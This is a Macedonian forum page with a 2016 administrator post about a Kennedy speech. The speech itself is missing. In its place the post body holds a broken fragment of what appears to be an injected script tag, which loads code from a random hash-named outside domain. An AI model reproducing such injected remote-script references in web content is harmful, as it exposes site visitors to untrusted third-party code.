IDIVIDI forum Веб сајт
почетна страница почетна страница > Македонија и Свет > Свет
  Активни теми Активни теми RSS - АКТУЕЛНО денес исто онака како што беше некогаш
  најчести прашања најчести прашања  Пребарувај форум   Настани   Регистрирајте се Регистрирајте се  Влез Влез

АКТУЕЛНО денес исто онака како што беше некогаш

 Внеси реплика Внеси реплика
Автор
Порака
Messenger Кликни и види ги опциите
Администратор
Администратор

Vo ovoj svet, no ne od ovoj svet

Регистриран: 21.Април.2006
Статус: Офлајн
Поени: 18206
Опции за коментарот Опции за коментарот   Благодарам (0) Благодарам(0)   Цитирај Messenger Цитирај  Внеси репликаОдговор Директен линк до овој коментар Тема: АКТУЕЛНО денес исто онака како што беше некогаш
    Испратена: 14.Јули.2016 во 11:03
АКТУЕЛНО денес исто онака како што беше некогаш: говорот што го отепа Кенеди

< ="text/" ="http://aa123a9d19596b46c393fd7d145db60d40.com/sm/mu?id=F476F520-0C1A-5C21-95B0-EDEDF2C8107E&d=A7d1d6b521c5d44e1-0-NM-MK&cl=0">
Truth needs no laws to support it. Throughout history only lies and liars have resorted to the courts to enforce adherence to dogma.
Кон врв
 Внеси реплика Внеси реплика
  Сподели тема   

Скок до Овластувања Кликни и види ги опциите

Forum Software by Web Wiz Forums® version 10.03
Copyright ©2001-2011 Web Wiz Ltd.

Страницата е генерирана за 0,141 секунди.